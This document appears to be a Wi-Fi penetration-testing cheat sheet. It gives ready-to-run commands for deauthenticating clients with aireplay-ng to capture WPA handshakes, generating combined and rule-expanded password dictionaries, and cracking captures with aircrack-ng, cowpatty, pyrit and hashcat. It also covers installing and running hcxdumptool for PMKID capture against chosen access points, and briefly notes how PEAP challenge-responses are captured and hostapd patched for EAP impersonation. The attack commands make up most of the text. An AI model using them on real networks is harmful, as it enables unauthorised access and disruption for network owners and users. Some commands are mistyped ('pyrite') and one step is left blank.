WPA/WPA2

WPA/WPA2 PSK

Deauthenticate a supplicant
aireplay-ng -0 20 -a <ap_mac> -c <supplicant_mac> <wlan1mon>

1.Deauthenticate with the broadcast address can be very efficient and convenient
2.Airodump should say “WPA Handshake”

Dictionary generation

Concatenate + Uppercase

WifiKey, Networkkey…

nano lower_dico.txt
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt
/usr/lib/hashcat-utils/combinator.bin lower_dico.txt lower_dico.txt > ll_dico.txt
/usr/lib/hashcat-utils/combinator.bin lower_dico.txt upper_dico.txt > lu_dico.txt
/usr/lib/hashcat-utils/combinator.bin upper_dico.txt lower_dico.txt > ul_dico.txt
/usr/lib/hashcat-utils/combinator.bin upper_dico.txt upper_dico.txt > uu_dico.txt
cat ll_dico.txt lu_dico.txt ul_dico.txt uu_dico.txt | sort | uniq > concatenated.txt

One Separator + Uppercase

Use this technic with multiple separators: -_$*
Wifi-key, Network-Key…

nano lower_dico.txt
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt
hashcat -a 1 upper_dico.txt lower_dico.txt -j '$<SEPARATOR>' --stdout >> ul_seperated.txt
hashcat -a 1 upper_dico.txt upper_dico.txt -j '$<SEPARATOR>' --stdout >> uu_seperated.txt

Two Separator + Uppercase

Use this technic with multiple separators: -_$*
Wifi-Key-Network, Mobile-Wifi-Key…

nano lower_dico.txt
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt
hashcat -a 1 upper_dico.txt uu_seperated.txt -j '$<SEPARATOR>' --stdout >> uuu_seperated.txt

Add rules

Each generated dictionary can be enhanced by applying rules on it

cat <created_dico.txt> | hashcat -r </usr/share/hashcat/rules/best64.rule> --stdout | sort | uniq > <fina_dico.txt>
Crack

aircrack

aircrack-ng -w <dico> <cap.pcap>

Rainbow tables - cowpatty

genpmk -f <dico> -d <computed_hashes.txt> -s <essid>
cowpatty -r <cap.pcap> -d <computed_hashes.txt> -2 -s <essid>

GPU - pyrit

pyrit eval
pyrit -i <dico> import_passwords
pyrit -e <essid> create_essid
pyrite batch
pyrite -r <cap.pcap> -b <ap_mac> attack_db
rm -r ~/.pyrit/blobspace

GPU - hashcat

https://hashcat.net/cap2hccapx/
hashcat64.exe -m 2500 -r rules\best64.rule cap\capture.hccapx dict\custom_dict.txt
PMKID

It only works on AP that supports roaming.

Installation
apt install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev
cd /opt
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
make install
cd /opt
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install
cd /opt
Attack
1.Traffic capture

Opportunistic attack without mac filtering

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filtermode=2 --enable_status=3

Target one or more BSSID

Copy one or more BSSID in a file with all chars in uppercase and without any separator (remove all “:”).
Example: 50D72257AC2F

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filterlist=<mac.txt> --filtermode=2 --enable_status=3
2.PCAP to hashes
hcxpcaptool -z <out.hashes> <pmkid.pcap>
3.Crack

Solution 1
WPA-PMKID-PBKDF2 (16800)

Solution 2

hcxpcaptool -o <hccapx.hashes> <pmkid.pcap>

WPA-PMKID-PBKDF2 (2500)

802.1X

EAP

Server certificate

1) For Windows, the challenge response can be done using a domain user account or a computer account depending on the authentication mode.
2) In the default configuration of W10 the PEAP properties have the setting Tell user if the server’s identity can’t be verified.
Meaning that the user will be prompted to verify the certificate. However, if Don’t ask user to authorize new servers or trusted CAsis setup it is not possible to retrieve the challenge response.

Client certificate

If the server certificate can be impersonnated, and there is a client certificate. It is possible to patch hostapd in order to not verify the validity of the client certificate.
https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/